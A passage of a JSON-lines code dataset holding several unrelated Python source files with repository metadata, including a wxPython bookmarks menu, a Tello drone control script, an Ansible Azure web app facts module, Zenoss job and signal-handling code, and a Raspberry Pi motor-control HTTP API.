pygame.display.update()\r\n\r\n","repo_name":"JessicaFeng0926/pygame_examples","sub_path":"pg003transparent_circle/pg003transparent_circle.py","file_name":"pg003transparent_circle.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36087486769","text":"'''\nРеализовать класс и переопределить магические методы базовых математических операции (сложение, вычитание, умножение, деление), добавив туда выводы в консоль текущего действия.\n\nНапример: при умножении выводится сообщение, что происходит умножение.\n'''\nclass Test(int):\n '''инициализация'''\n def __init__(self, num):\n super().__init__()\n self.num = num\n \n '''cложение'''\n def __add__(self, num2):\n print('Процесс сложения')\n return self.num + num2\n '''Вычитание'''\n def __sub__(self, num3):\n print('Процесс вычитания')\n return self.num - num3\n '''Умножение'''\n def __mul__(self,num4):\n print('Процесс умножения')\n return self.num * num4\n '''Деление'''\n def __truediv__(self,num5):\n print('Процесс деления')\n return self.num / num5\n \na = Test(10)\nb = Test(2)\nc = Test(3)\nd = Test(2)\nf = Test(5)\nprint(a + b)\nprint(a - c)\nprint(a * c)\nprint(a / d)\n\n\n","repo_name":"NikitaR041/Courses-in-Innopolis","sub_path":"ДЗ-модуль_1_2/(9)19.12.2022 - Основы ООП/Работа с ООП (2).py","file_name":"Работа с ООП (2).py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26908792450","text":"import os.path\nimport wx\nfrom sProperty import *\nimport sScrolledMessageDialog\n\nclass sBookmarksMenu(wx.Menu):\n def __init__(self, parent):\n wx.Menu.__init__(self)\n\n self.ID_BOOKMARK_BASE = 5500\n\n self.ID_BOOKMARK_MENU = 5199\n\n self.bookmarks = []\n\n self.parent = parent\n self.datdirectory = parent.datdirectory\n\n self.loadBookmarks()\n\n def loadBookmarks(self):\n bookfile = self.datdirectory + \"/bookmarks.dat\"\n if os.path.exists(bookfile):\n try:\n #Read from the file\n f = open(bookfile, 'r')\n folders = [self]\n folderindex = 0\n menuTitles = []\n menuTitleindex = -1\n lastCount = 1\n bookmarkcount = 0\n #Skip the First Line\n line = f.readline()\n #Initialize\n line = f.readline()\n while line:\n c = line.count('\\t')\n line = line[c:].rstrip()\n while lastCount > c:\n folders[(folderindex - 1)].AppendMenu(self.ID_BOOKMARK_MENU, menuTitles.pop(), folders.pop())\n folderindex = folderindex - 1\n menuTitleindex = menuTitleindex - 1\n lastCount = lastCount - 1\n if line[0] == '>':\n folders.append(wx.Menu())\n menuTitles.append(line[1:])\n folderindex = folderindex + 1\n menuTitleindex = menuTitleindex + 1\n c = c + 1\n else:\n self.bookmarks.append(line)\n self.parent.Bind(wx.EVT_MENU, self.OnBookmark, id=(self.ID_BOOKMARK_BASE + bookmarkcount))\n folders[folderindex].Append((self.ID_BOOKMARK_BASE + bookmarkcount), line, line)\n bookmarkcount = bookmarkcount + 1\n lastCount = c\n line = f.readline()\n f.close()\n #Add any menus not yet added:\n c = 1\n while lastCount > c:\n folders[(folderindex - 1)].AppendMenu(self.ID_BOOKMARK_MENU, menuTitles.pop(), folders.pop())\n folderindex = folderindex - 1\n menuTitleindex = menuTitleindex - 1\n lastCount = lastCount - 1\n except:\n sScrolledMessageDialog.ShowMessage(self.parent, (\"Your bookmarks file is a tad messed up.\\n\"), \"Error\")\n\n def OnBookmark(self, event):\n bookmarkindex = event.GetId() - self.ID_BOOKMARK_BASE\n if not (os.path.exists(self.bookmarks[bookmarkindex])):\n sScrolledMessageDialog.ShowMessage(self.parent, (\"Error with: \" + self.bookmarks[bookmarkindex] + \"\\nBookmark does not actually exist.\\n\"), \"Error\")\n return\n if os.path.isdir(self.bookmarks[bookmarkindex]):\n self.parent.ddirectory = self.bookmarks[bookmarkindex].replace(\"\\\\\", \"/\")\n self.parent.OnOpen(event)\n return\n old = self.parent.txtDocument.filename\n filename = self.bookmarks[bookmarkindex].replace(\"\\\\\", \"/\")\n\n alreadyopen = self.parent.GetAlreadyOpen()\n if filename in alreadyopen:\n self.parent.setDocumentTo(alreadyopen.index(filename))\n return\n\n if (len(old) > 0) or self.parent.txtDocument.GetModify():\n self.parent.OpenFile(filename, True)\n else:\n self.parent.OpenFile(filename, False)\n\n def reloadBookmarks(self):\n mnuitems = self.GetMenuItems()\n num = len(mnuitems)\n x = 0\n while x < num:\n self.Remove(mnuitems[x].GetId())\n #mnuitems[x].Destroy()\n x = x + 1\n self.bookmarks = []\n self.loadBookmarks()\n","repo_name":"Thoshh/seer-editor","sub_path":"sBookmarksMenu.py","file_name":"sBookmarksMenu.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40502772067","text":"from modules import keyboard_module as kb\r\nfrom djitellopy import Tello\r\nimport numpy as np\r\nimport time,cv2,math\r\n\r\n\r\n\r\n######### Params\r\nfspeed = 120/10 # Forward speed cm/s\r\naSpeed = 360/6 # Angular Speed Degrees/s\r\ninterval = 0.25\r\ndInterval = fspeed*interval\r\naInterval = aSpeed*interval\r\nx,y=500,500\r\na = 0\r\nyaw = 0\r\npoints = [(0,0),(0,0)]\r\n###########################\r\n\r\nkb.init()\r\n\r\ntello = Tello()\r\ntello.connect()\r\nprint('Status | Battery=', tello.get_battery())\r\n\r\nglobal img\r\n\r\ndef getKeyboardInput():\r\n lr, fb, ud, yv = 0, 0, 0, 0\r\n speed = 15\r\n aspeed = 50\r\n global x,y,yaw,a \r\n d = 0\r\n\r\n if kb.getKey(\"LEFT\"): \r\n lr = -speed\r\n d = dInterval\r\n a = -180\r\n\r\n elif kb.getKey(\"RIGHT\"): \r\n lr = speed\r\n d = -dInterval\r\n a = 180\r\n\r\n if kb.getKey(\"UP\"): \r\n fb = speed\r\n d = dInterval\r\n a = 270\r\n\r\n elif kb.getKey(\"DOWN\"): \r\n fb = -speed\r\n d = -dInterval\r\n a = -90\r\n\r\n if kb.getKey(\"w\"): \r\n ud = speed\r\n elif kb.getKey(\"s\"): \r\n ud = -speed\r\n\r\n if kb.getKey(\"a\"): \r\n yv = -aspeed\r\n yaw -= aInterval\r\n\r\n elif kb.getKey(\"d\"): \r\n yv = aspeed\r\n yaw += aInterval\r\n\r\n if kb.getKey(\"h\"): \r\n tello.takeoff()\r\n time.sleep(2)\r\n\r\n if kb.getKey(\"q\"): \r\n tello.send_rc_control(0,0,0,0)\r\n tello.land()\r\n\r\n if kb.getKey(\"t\"):\r\n cv2.imwrite(f'resources/images/{time.time()}.jpg', img)\r\n time.sleep(0.3)\r\n\r\n time.sleep(0.25)\r\n a += yaw\r\n x += int(d*math.cos(math.radians(a)))\r\n y += int(d*math.sin(math.radians(a)))\r\n\r\n return [lr, fb, ud, yv, x, y]\r\n\r\ntello.streamon() # EDU no support when connected to wifi\r\n\r\ndef drawPoints(img, points):\r\n for point in points:\r\n cv2.circle(img,point,5,(0,0,255),cv2.FILLED)\r\n cv2.circle(img,points[-1],8,(0,255,0),cv2.FILLED)\r\n cv2.putText(img, f'({(points[-1][0]-500)/100},{(points[-1][1]-500)/100})m',\r\n (points[-1][0]+10,points[-1][1]+30),cv2.FONT_HERSHEY_PLAIN, 1, (255,0,255), 1) \r\n\r\n\r\nwhile True:\r\n vals = getKeyboardInput()\r\n tello.send_rc_control(vals[0],vals[1],vals[2],vals[3])\r\n \r\n # print('Status | TOF=', tello.get_distance_tof())\r\n # print('Status | Height=', tello.get_height())\r\n\r\n # img = tello.get_frame_read().frame\r\n # img = cv2.resize(img, (360, 240))\r\n # cv2.imshow(\"Image\", img)\r\n # cv2.waitKey(1)\r\n\r\n img = np.zeros((1000,1000, 3), np.uint8)\r\n if(points[-1][0]!=vals[4] or points[-1][1]!=vals[5]):\r\n points.append([vals[4],vals[5]])\r\n drawPoints(img, points)\r\n cv2.imshow(\"Output\", img)\r\n cv2.waitKey(1)\r\n\r\n time.sleep(0.03)","repo_name":"Harvard-MDE/TelloPet","sub_path":"projects/Mapping.py","file_name":"Mapping.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29365612491","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: azure_rm_webapp_facts\n\nversion_added: \"2.7\"\n\nshort_description: Get azure web app facts.\n\ndescription:\n - Get facts for a specific web app or all web app in a resource group, or all web app in current subscription.\n\noptions:\n name:\n description:\n - Only show results for a specific web app.\n resource_group:\n description:\n - Limit results by resource group.\n return_publish_profile:\n description:\n - Indicate wheather to return publishing profile of the web app.\n default: False\n type: bool\n tags:\n description:\n - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.\n\nextends_documentation_fragment:\n - azure\n\nauthor:\n - \"Yunge Zhu (@yungezz)\"\n'''\n\nEXAMPLES = '''\n - name: Get facts for web app by name\n azure_rm_webapp_facts:\n resource_group: testrg\n name: winwebapp1\n\n - name: Get facts for web apps in resource group\n azure_rm_webapp_facts:\n resource_group: testrg\n\n - name: Get facts for web apps with tags\n azure_rm_webapp_facts:\n tags:\n - testtag\n - foo:bar\n'''\n\nRETURN = '''\nwebapps:\n description: List of web apps.\n returned: always\n type: complex\n contains:\n id:\n description:\n - Id of the web app.\n returned: always\n type: str\n sample: /subscriptions/xxxx/resourceGroups/xxx/providers/Microsoft.Web/sites/xx\n name:\n description:\n - Name of the web app.\n returned: always\n type: str\n resource_group:\n description:\n - Resource group of the web app.\n returned: always\n type: str\n location:\n description:\n - Location of the web app.\n returned: always\n type: str\n plan:\n description:\n - Id of app service plan used by the web app.\n returned: always\n type: str\n sample: /subscriptions/xxxx/resourceGroups/xxx/providers/Microsoft.Web/serverfarms/xxx\n app_settings:\n description:\n - App settings of the application. Only returned when web app has app settings.\n type: complex\n frameworks:\n description:\n - Frameworks of the application. Only returned when web app has frameworks.\n type: complex\n availability_state:\n description: Availability of this web app.\n type: str\n default_host_name:\n description: Host name of the web app.\n type: str\n enabled:\n description: Indicates the web app enabled or not.\n type: bool\n enabled_host_names:\n description: Enabled host names of the web app.\n type: list\n host_name_ssl_states:\n description: SSL state per host names of the web app.\n type: list\n host_names:\n description: Host names of the web app.\n type: list\n outbound_ip_addresses:\n description: Outbound ip address of the web app.\n type: str\n state:\n description: State of the web app. eg. running.\n type: str\n publishing_username:\n description: Publishing profle user name.\n returned: only when I(return_publish_profile) is True.\n type: str\n publishing_password:\n description: Publishing profile password.\n returned: only when I(return_publish_profile) is True.\n type: str\n'''\ntry:\n from msrestazure.azure_exceptions import CloudError\n from msrestazure.azure_operation import AzureOperationPoller\n from azure.common import AzureMissingResourceHttpError, AzureHttpError\nexcept:\n # This is handled in azure_rm_common\n pass\n\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\n\nAZURE_OBJECT_CLASS = 'WebApp'\n\n\nclass AzureRMWebAppFacts(AzureRMModuleBase):\n\n def __init__(self):\n\n self.module_arg_spec = dict(\n name=dict(type='str'),\n resource_group=dict(type='str'),\n tags=dict(type='list'),\n return_publish_profile=dict(type=bool, default=False)\n )\n\n self.results = dict(\n changed=False,\n webapps=[]\n )\n\n self.name = None\n self.resource_group = None\n self.tags = None\n self.return_publish_profile = False\n\n self.framework_names = ['net_framework', 'java', 'php', 'node', 'python', 'dotnetcore', 'ruby']\n\n super(AzureRMWebAppFacts, self).__init__(self.module_arg_spec,\n supports_tags=False,\n facts_module=True)\n\n def exec_module(self, **kwargs):\n\n for key in self.module_arg_spec:\n setattr(self, key, kwargs[key])\n\n if self.name:\n self.results['webapps'] = self.list_by_name()\n elif self.resource_group:\n self.results['webapps'] = self.list_by_resource_group()\n else:\n self.results['webapps'] = self.list_all()\n\n return self.results\n\n def list_by_name(self):\n self.log('Get web app {0}'.format(self.name))\n item = None\n result = []\n\n try:\n item = self.web_client.web_apps.get(self.resource_group, self.name)\n except CloudError:\n pass\n\n if item and self.has_tags(item.tags, self.tags):\n curated_result = self.get_curated_webapp(self.resource_group, self.name, item)\n result = [curated_result]\n\n return result\n\n def list_by_resource_group(self):\n self.log('List web apps in resource groups {0}'.format(self.resource_group))\n try:\n response = list(self.web_client.web_apps.list_by_resource_group(self.resource_group))\n except CloudError as exc:\n request_id = exc.request_id if exc.request_id else ''\n self.fail(\"Error listing web apps in resource groups {0}, request id: {1} - {2}\".format(self.resource_group, request_id, str(exc)))\n\n results = []\n for item in response:\n if self.has_tags(item.tags, self.tags):\n curated_output = self.get_curated_webapp(self.resource_group, item.name, item)\n results.append(curated_output)\n return results\n\n def list_all(self):\n self.log('List web apps in current subscription')\n try:\n response = list(self.web_client.web_apps.list())\n except CloudError as exc:\n request_id = exc.request_id if exc.request_id else ''\n self.fail(\"Error listing web apps, request id {0} - {1}\".format(request_id, str(exc)))\n\n results = []\n for item in response:\n if self.has_tags(item.tags, self.tags):\n curated_output = self.get_curated_webapp(item.resource_group, item.name, item)\n results.append(curated_output)\n return results\n\n def list_webapp_configuration(self, resource_group, name):\n self.log('Get web app {0} configuration'.format(name))\n\n response = []\n\n try:\n response = self.web_client.web_apps.get_configuration(resource_group_name=resource_group, name=name)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} configuration, request id {1} - {2}'.format(name, request_id, str(ex)))\n\n return response.as_dict()\n\n def list_webapp_appsettings(self, resource_group, name):\n self.log('Get web app {0} app settings'.format(name))\n\n response = []\n\n try:\n response = self.web_client.web_apps.list_application_settings(resource_group_name=resource_group, name=name)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} app settings, request id {1} - {2}'.format(name, request_id, str(ex)))\n\n return response.as_dict()\n\n def get_publish_credentials(self, resource_group, name):\n self.log('Get web app {0} publish credentials'.format(name))\n try:\n poller = self.web_client.web_apps.list_publishing_credentials(resource_group, name)\n if isinstance(poller, AzureOperationPoller):\n response = self.get_poller_result(poller)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} publishing credentials - {1}'.format(request_id, str(ex)))\n return response\n\n def get_curated_webapp(self, resource_group, name, webapp):\n pip = self.serialize_obj(webapp, AZURE_OBJECT_CLASS)\n\n try:\n site_config = self.list_webapp_configuration(resource_group, name)\n app_settings = self.list_webapp_appsettings(resource_group, name)\n publish_cred = self.get_publish_credentials(resource_group, name)\n except CloudError as ex:\n pass\n return self.construct_curated_webapp(webapp=pip,\n configuration=site_config,\n app_settings=app_settings,\n deployment_slot=None,\n publish_credentials=publish_cred)\n\n def construct_curated_webapp(self, webapp, configuration=None, app_settings=None, deployment_slot=None, publish_credentials=None):\n curated_output = dict()\n curated_output['id'] = webapp['id']\n curated_output['name'] = webapp['name']\n curated_output['resource_group'] = webapp['properties']['resourceGroup']\n curated_output['location'] = webapp['location']\n curated_output['plan'] = webapp['properties']['serverFarmId']\n curated_output['tags'] = webapp.get('tags', None)\n\n # important properties from output. not match input arguments.\n curated_output['app_state'] = webapp['properties']['state']\n curated_output['availability_state'] = webapp['properties']['availabilityState']\n curated_output['default_host_name'] = webapp['properties']['defaultHostName']\n curated_output['host_names'] = webapp['properties']['hostNames']\n curated_output['enabled'] = webapp['properties']['enabled']\n curated_output['enabled_host_names'] = webapp['properties']['enabledHostNames']\n curated_output['host_name_ssl_states'] = webapp['properties']['hostNameSslStates']\n curated_output['outbound_ip_addresses'] = webapp['properties']['outboundIpAddresses']\n\n # curated site_config\n if configuration:\n curated_output['frameworks'] = []\n for fx_name in self.framework_names:\n fx_version = configuration.get(fx_name + '_version', None)\n if fx_version:\n fx = {\n 'name': fx_name,\n 'version': fx_version\n }\n # java container setting\n if fx_name == 'java':\n if configuration['java_container'] and configuration['java_container_version']:\n settings = {\n 'java_container': configuration['java_container'].lower(),\n 'java_container_version': configuration['java_container_version']\n }\n fx['settings'] = settings\n\n curated_output['frameworks'].append(fx)\n\n # linux_fx_version\n if configuration.get('linux_fx_version', None):\n tmp = configuration.get('linux_fx_version').split(\"|\")\n if len(tmp) == 2:\n curated_output['frameworks'].append({'name': tmp[0].lower(), 'version': tmp[1]})\n\n # curated app_settings\n if app_settings and app_settings.get('properties', None):\n curated_output['app_settings'] = dict()\n for item in app_settings['properties']:\n curated_output['app_settings'][item] = app_settings['properties'][item]\n\n # curated deploymenet_slot\n if deployment_slot:\n curated_output['deployment_slot'] = deployment_slot\n\n # curated publish credentials\n if publish_credentials and self.return_publish_profile:\n curated_output['publishing_username'] = publish_credentials.publishing_user_name\n curated_output['publishing_password'] = publish_credentials.publishing_password\n return curated_output\n\n\ndef main():\n AzureRMWebAppFacts()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/azure/azure_rm_webapp_facts.py","file_name":"azure_rm_webapp_facts.py","file_ext":"py","file_size_in_byte":13143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17624214533","text":"import cgi\nimport logging\nfrom collections import defaultdict\nfrom Products import Zuul\nfrom Products.ZenMessaging.audit import audit\nfrom Products.ZenUtils.Ext import DirectRouter, DirectResponse\nfrom Products.Jobber.exceptions import NoSuchJobException\nfrom zope.event import notify\nfrom ZODB.transact import transact\nfrom Products.ZenUtils.events import QuickstartWizardFinishedEvent\n\nlog = logging.getLogger(\"zen.JobsRouter\")\n\n\nJOBKEYS = [\n \"uuid\",\n \"type\",\n \"description\",\n \"scheduled\",\n \"started\",\n \"finished\",\n \"duration\",\n \"status\",\n \"user\",\n \"logfile\",\n]\n\n\nclass JobsRouter(DirectRouter):\n \"\"\"\n A JSON/Ext.Direct interface to operations on jobs\n \"\"\"\n\n def __init__(self, context, request):\n self.api = Zuul.getFacade(\"jobs\", context.dmd)\n self.context = context\n self.request = request\n super(DirectRouter, self).__init__(context, request)\n\n def getJobs(self, start, limit, page, sort, dir, uid=None):\n # if user isn't global only show them the jobs they created\n user = self.context.dmd.ZenUsers.getUserSettings()\n createdBy = user.id if user.hasNoGlobalRoles() else None\n\n results, total = self.api.queryJobs(\n start=start, limit=limit, sort=sort, dir=dir, createdBy=createdBy\n )\n jobs = Zuul.marshal(results, keys=JOBKEYS)\n log.debug(\"Retrieved %s of %s jobs\", len(jobs), total)\n for job in jobs:\n job[\"description\"] = cgi.escape(job.get(\"description\") or \"\")\n return DirectResponse(jobs=jobs, totalCount=total)\n\n def abort(self, jobids):\n for id_ in jobids:\n try:\n self.api.abortJob(id_)\n except NoSuchJobException:\n log.debug(\"Unable to abort job: %s No such job found.\", id_)\n\n def deleteJobs(self, jobids):\n # Make sure they have permission to delete.\n if not Zuul.checkPermission(\"Manage DMD\"):\n return DirectResponse.fail(\n \"You don't have permission to execute this command\",\n sticky=False,\n )\n\n deletedJobs = []\n for id_ in jobids:\n try:\n self.api.deleteJob(id_)\n except NoSuchJobException:\n log.debug(\"Unable to delete job: %s No such job found.\", id_)\n else:\n deletedJobs.append(id_)\n if deletedJobs:\n audit(\"UI.Jobs.Delete\", ids=deletedJobs)\n return DirectResponse.succeed(\n deletedJobs=Zuul.marshal(deletedJobs)\n )\n\n def getInfo(self, jobid):\n job = self.api.getJob(jobid)\n return DirectResponse.succeed(data=Zuul.marshal(job, keys=JOBKEYS))\n\n def detail(self, jobid):\n try:\n logfile, content, maxLimit = self.api.getJobLog(jobid)\n except NoSuchJobException:\n # Probably a detail request overlapped a delete request. Just\n # return None.\n logfile, content, maxLimit = None, None, None\n return {\"content\": content, \"logfile\": logfile, \"maxLimit\": maxLimit}\n\n def userjobs(self):\n results = defaultdict(list)\n totals = {}\n validstates = {\n \"STARTED\": \"started\",\n \"SUCCESS\": \"finished\",\n \"PENDING\": \"created\",\n \"RETRY\": \"started\",\n }\n for job in self.api.getUserJobs():\n if job.status in validstates:\n results[job.status].append(job)\n # Sort and slice appropriately -- most recent 10 items\n for status, jobs in results.iteritems():\n try:\n jobs.sort(\n key=lambda j: getattr(j, validstates[status]),\n reverse=True\n )\n except Exception as ex:\n log.warn(\"Couldn't sort: (%r) %s\", ex, ex)\n log.warn(\"%s -> %s\", status, jobs)\n totals[status] = len(jobs)\n results[status] = jobs[:10]\n jobs = Zuul.marshal(results, keys=JOBKEYS)\n for joblist in jobs.itervalues():\n for job in joblist:\n job[\"description\"] = cgi.escape(job[\"description\"])\n return DirectResponse(jobs=jobs, totals=totals)\n\n def quickstartWizardFinished(self):\n # a place to hook up anything that needs to happen\n app = self.context.dmd.primaryAq().getParentNode().getParentNode()\n transact(notify)(QuickstartWizardFinishedEvent(app))\n return DirectResponse.succeed()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/routers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"21561018646","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom wsgiref.simple_server import make_server\nimport falcon\nimport json\nimport requests\n\n#ML = Motor Left\n#MR = Motor Right\n\nR_PWM = 21\nL_PWM = 12\nR_EN = 20\nL_EN = 16\n\nML_R_PWM = 24\nML_L_PWM = 23\nML_R_EN = 22\nML_L_EN = 27\n\nBALLAST_IN = 17\nBALLAST_OUT = 18\n\nPins = [[R_PWM, L_PWM, R_EN, L_EN],[ML_R_PWM, ML_L_PWM, R_EN, L_EN]]\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(R_PWM, GPIO.OUT)\nGPIO.setup(L_PWM, GPIO.OUT)\nGPIO.setup(R_EN, GPIO.OUT)\nGPIO.setup(L_EN, GPIO.OUT)\nGPIO.setup(ML_R_PWM, GPIO.OUT)\nGPIO.setup(ML_L_PWM, GPIO.OUT)\nGPIO.setup(ML_R_EN, GPIO.OUT)\nGPIO.setup(ML_L_EN, GPIO.OUT)\nGPIO.setup(BALLAST_IN, GPIO.OUT)\nGPIO.setup(BALLAST_OUT, GPIO.OUT)\nGPIO.output(R_EN, True)\nGPIO.output(L_EN, True)\nGPIO.output(ML_R_EN, True)\nGPIO.output(ML_L_EN, True)\n\nM1_Vitesse = GPIO.PWM(R_PWM, 100)\nM2_Vitesse = GPIO.PWM(ML_R_PWM, 100)\n\ndef forward():\n GPIO.output(L_PWM, False) # start turning right\n GPIO.output(R_PWM, True) # stop turning left\n GPIO.output(ML_L_PWM, False) # start turning right\n GPIO.output(ML_R_PWM, True) # stop turning left\n print(\"les 2 moteurs tourne\")\n \ndef stop():\n GPIO.output(L_PWM, False)\n GPIO.output(R_PWM, False)\n GPIO.output(ML_L_PWM, False)\n GPIO.output(ML_R_PWM, False)\n print (\"stopper\")\n\n# Sens Moteur\ndef mr_right():\n GPIO.output(L_PWM, False) # start turning right\n GPIO.output(R_PWM, True) # stop turning left\n print(\"Moteur tourne dans le sens 1.\")\n \ndef mr_left():\n GPIO.output(L_PWM, True) # stop turning left\n GPIO.output(R_PWM, False) # start turning right\n print(\"Moteur tourne dans le sens 2.\")\n \ndef ml_right():\n GPIO.output(ML_L_PWM, False) # start turning right\n GPIO.output(ML_R_PWM, True) # stop turning left\n print(\"Moteur tourne dans le sens 1.\")\n \ndef ml_left():\n GPIO.output(ML_L_PWM, True) # stop turning left\n GPIO.output(ML_R_PWM, False) # start turning right\n print(\"Moteur tourne dans le sens 2.\") \n \n# Remplissage Poche \ndef ballast_in():\n GPIO.output(BALLAST_IN, True) # stop turning left\n GPIO.output(BALLAST_OUT, False)\n print(\"Remplissage de la poche dans le sens 1.\")\n\ndef ballast_out():\n GPIO.output(BALLAST_IN, False) # stop turning left\n GPIO.output(BALLAST_OUT, True)\n print(\"Remplissage de la poche dans le sens 2.\")\n \ndef ballast_off():\n GPIO.output(BALLAST_IN, True) # stop turning left\n GPIO.output(BALLAST_OUT, True)\n print(\"Arrêt du remplissage de la poche.\")\n \n \n# Arret des moteurs \n#def cleanup():\n# GPIO.cleanup()\n# print(\"Arrêt des moteurs.\")\n \n#def Stop():\n # M1_Vitesse = GPIO.PWM(R_PWM, 0)\n # print(\"les 2 moteurs arrete\")\n #GPIO.cleanup()\n #M1_Vitesse = GPIO.PWM(R_PWM, 0)\n # print(\"Moteur arret.\") \n \n\n# Appel de la fonction moteur dans le sens 1\ndef set_motor_forward():\n forward()\n return json.dumps({\"result\": \"success forward\"})\n\ndef set_mr_motor_right():\n mr_right()\n return json.dumps({\"result\": \"success motor right right\"})\n\ndef set_mr_motor_left():\n mr_left()\n return json.dumps({\"result\": \"success motor right left\"})\n\ndef set_ml_motor_right():\n ml_right()\n return json.dumps({\"result\": \"success motor left right\"})\n\ndef set_ml_motor_left():\n ml_left()\n return json.dumps({\"result\": \"success motor left left\"})\n\ndef set_motor_stop():\n stop()\n return json.dumps({\"result\": \"success stop\"})\n\n# Activation de la poche dans un sens \ndef set_ballast_in():\n ballast_in()\n return json.dumps({\"result\": \"ballast_in\"})\n\n# Activation de la poche dans un autre sens \ndef set_ballast_out():\n ballast_out()\n return json.dumps({\"result\": \"ballast_out\"})\n\n# Arret du relais\ndef set_ballast_off():\n ballast_off()\n return json.dumps({\"result\": \"ballast_off\"})\n\n# Activation du moteur avec speed comme variable de vitesse\nclass MotorResourceF:\n def on_post(self, req, resp):\n M1_Vitesse.start(req.media[\"speed\"])\n M2_Vitesse.start(req.media[\"speed\"])\n resp.text = set_motor_forward()\n print(req.media[\"speed\"])\n \nclass MotorResourceS:\n def on_post(self, req, resp):\n M1_Vitesse.start(req.media[\"stop\"])\n M2_Vitesse.start(req.media[\"stop\"])\n resp.text = set_motor_stop()\n print(req.media[\"stop\"])\n\nclass MrMotorResourceR:\n def on_post(self, req, resp):\n M1_Vitesse.start(req.media[\"speed\"])\n resp.text = set_mr_motor_right()\n print(req.media[\"speed\"])\n \nclass MrMotorResourceL:\n def on_post(self, req, resp):\n M1_Vitesse.start(req.media[\"speed\"])\n resp.text = set_mr_motor_left()\n print(req.media[\"speed\"])\n \nclass MlMotorResourceR:\n def on_post(self, req, resp):\n M2_Vitesse.start(req.media[\"speed\"])\n resp.text = set_ml_motor_right()\n print(req.media[\"speed\"])\n \nclass MlMotorResourceL:\n def on_post(self, req, resp):\n M2_Vitesse.start(req.media[\"speed\"])\n resp.text = set_ml_motor_left()\n print(req.media[\"speed\"])\n \n \nclass BallastInResource:\n def on_post(self, req, resp):\n resp.text = set_ballast_in()\n \nclass BallastOutResource:\n def on_post(self, req, resp):\n resp.text = set_ballast_out() \n\n# Arret des moteurs\n#class StopFunc:\n #def on_post(self, req, resp):\n #arret()\n\n# Arret de la poche\nclass StopBallastFunc:\n def on_post(self, req, resp):\n set_ballast_off() \n\n\napp = falcon.App()\nmotorOnF = MotorResourceF()\nmotorMrOnR = MrMotorResourceR()\nmotorMrOnL = MrMotorResourceL()\nmotorMlOnR = MlMotorResourceR()\nmotorMlOnL = MlMotorResourceL()\nmotorOnS = MotorResourceS()\nballastIn = BallastInResource()\nballastOut = BallastOutResource()\nballastStop = StopBallastFunc()\n\napp.add_route(\"/motor_f\", motorOnF)\napp.add_route(\"/motor_mr_r\", motorMrOnR)\napp.add_route(\"/motor_mr_l\", motorMrOnL)\napp.add_route(\"/motor_ml_r\", motorMlOnR)\napp.add_route(\"/motor_ml_l\", motorMlOnL)\napp.add_route(\"/motor_s\", motorOnS)\napp.add_route(\"/ballast_in\", ballastIn)\napp.add_route(\"/ballast_out\", ballastOut)\napp.add_route(\"/ballast_stop\", ballastStop)\n\n\nif __name__ == \"__main__\":\n\n with make_server(\"\", 80, app) as httpd:\n print(\"API ONLINE\")\n httpd.serve_forever()\n\n\n","repo_name":"RouleBe/Torpille","sub_path":"Torpille.py","file_name":"Torpille.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17621844643","text":"import sys\nimport signal\nimport inspect\nfrom Signals.SignalHandler import LOG\nfrom Signals.SignalHandler import get_signal_name\nfrom Signals.SignalHandler import SignalHandler as OriginalSignalHandler\n\ndef improvedSignalHandler(signum, frame):\n \"\"\"Improved signal handler that dispatches to registered handlers.\"\"\"\n signame = get_signal_name(signum)\n LOG.info(\"Caught signal %s\" % signame)\n\n for handler in OriginalSignalHandler.registry.get(signum, []):\n # Never let a bad handler prevent the standard signal\n # handlers from running.\n try:\n if inspect.getargspec(handler).args:\n handler(signum, frame)\n else:\n handler()\n except Exception:\n LOG.warn('A handler for %s failed!' % signame,\n exc_info=sys.exc_info())\n\ndef upgradeHandler(signum):\n signal.signal(signum, improvedSignalHandler)\n signame = get_signal_name(signum)\n LOG.debug(\"Upgraded sighandler for %s\", signame)\n\noriginalRegisterHandler = OriginalSignalHandler.registerHandler\ndef improvedRegisterHandler(signum, handler):\n wasnt_installed = (signum not in OriginalSignalHandler.registry)\n originalRegisterHandler(signum, handler)\n if wasnt_installed and (signum in OriginalSignalHandler.registry):\n upgradeHandler(signum)\n\nOriginalSignalHandler.registerHandler = improvedRegisterHandler\nfor signum in OriginalSignalHandler.registry:\n upgradeHandler(signum)\n\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/patches/signalsmonkey.py","file_name":"signalsmonkey.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"32929833021","text":"class Stundent :\n def __init__(self, name , studeng_id):\n self.name = name\n self.student_id = studeng_id\n self.grades = {\"语文\" : 